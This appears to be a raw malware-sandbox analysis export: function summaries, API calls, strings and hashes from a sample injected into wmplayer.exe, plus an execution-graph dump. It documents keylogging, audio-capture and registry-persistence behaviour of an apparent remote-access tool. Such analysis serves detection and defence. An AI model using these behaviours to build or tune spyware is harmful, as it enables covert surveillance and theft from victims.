                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: : $Se.
                                                                                            • API String ID: 4218353326-4089948878
                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                            • API String ID: 481472006-2430845779
                                                                                            • Opcode ID: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                            • Opcode Fuzzy Hash: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                            APIs
                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExistsFilePath
                                                                                            • String ID: alarm.wav$xIG
                                                                                            • API String ID: 1174141254-4080756945
                                                                                            • Opcode ID: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                            • Opcode Fuzzy Hash: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                            • String ID: Online Keylogger Stopped
                                                                                            • API String ID: 1623830855-1496645233
                                                                                            • Opcode ID: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                            • Opcode Fuzzy Hash: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                            APIs
                                                                                            • waveInPrepareHeader.WINMM(00D852E0,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                            • waveInAddBuffer.WINMM(00D852E0,00000020,?,00000000,00401913), ref: 0040175D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                            • String ID: T=G
                                                                                            • API String ID: 2315374483-379896819
                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                            APIs
                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocaleValid
                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                            • API String ID: 1901932003-3128777819
                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID: T=G$T=G
                                                                                            • API String ID: 3519838083-3732185208
                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                            • String ID: [AltL]$[AltR]
                                                                                            • API String ID: 2738857842-2658077756
                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00448825
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                            • String ID: `@$`@
                                                                                            • API String ID: 1353095263-20545824
                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State
                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                            • API String ID: 1649606143-2446555240
                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteOpenValue
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                            • API String ID: 2654517830-1051519024
                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 3325800564-4028850238
                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                            APIs
                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 1872346434-4028850238
                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1717984340-0
                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.4%
                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:84
                                                                                            execution_graph: interactive graph data (node ids, function addresses, API-call labels and edge list) that is rendered only in the viewer; the raw node/edge dump is not reproduced in this text export.
38034->38037 38035->38034 38039 4099f4 3 API calls 38036->38039 38038 40a93e memcpy 38037->38038 38038->37955 38040 40a93d 38039->38040 38040->38038 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37956 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37964 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset 
GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37893 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37894 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38220 409bca GetModuleFileNameW 38149->38220 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38221 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38153->38221 38154->38153 38156 411b67 38222 402afb 38156->38222 38160 411b7f 38278 40ea13 SendMessageW memset SendMessageW 38160->38278 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38303 40969c LoadCursorW SetCursor 38166->38303 38168 411143 38304 4032b4 38168->38304 38322 444a54 38168->38322 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38325 410c46 10 API calls 38171->38325 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37976 38181 40eb10 38180->38181 38193 40e8e0 38181->38193 38184 40eb6c memcpy memcpy 
38185 40ebb7 38184->38185 38185->38184 38186 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38186 38189 40d134 16 API calls 38185->38189 38187 40ec2e ??2@YAPAXI 38186->38187 38190 40ec65 38186->38190 38187->38190 38189->38185 38190->38190 38203 40ea7f 38190->38203 38192 402f49 38192->37976 38194 40e8f2 38193->38194 38195 40e8eb ??3@YAXPAX 38193->38195 38196 40e900 38194->38196 38197 40e8f9 ??3@YAXPAX 38194->38197 38195->38194 38198 40e911 38196->38198 38199 40e90a ??3@YAXPAX 38196->38199 38197->38196 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38198->38200 38201 40e921 ??3@YAXPAX 38198->38201 38202 40e92a ??3@YAXPAX 38198->38202 38199->38198 38200->38184 38201->38202 38202->38200 38204 40aa04 free 38203->38204 38205 40ea88 38204->38205 38206 40aa04 free 38205->38206 38207 40ea90 38206->38207 38208 40aa04 free 38207->38208 38209 40ea98 38208->38209 38210 40aa04 free 38209->38210 38211 40eaa0 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eab3 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40eabd 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40eac7 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40ead1 38218->38219 38219->38192 38220->38152 38221->38156 38279 40b2cc 38222->38279 38224 402b0a 38225 40b2cc 27 API calls 38224->38225 38226 402b23 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b3a 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b54 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b6b 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b82 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b99 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bb0 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bc7 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bde 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bf5 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c0c 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c23 
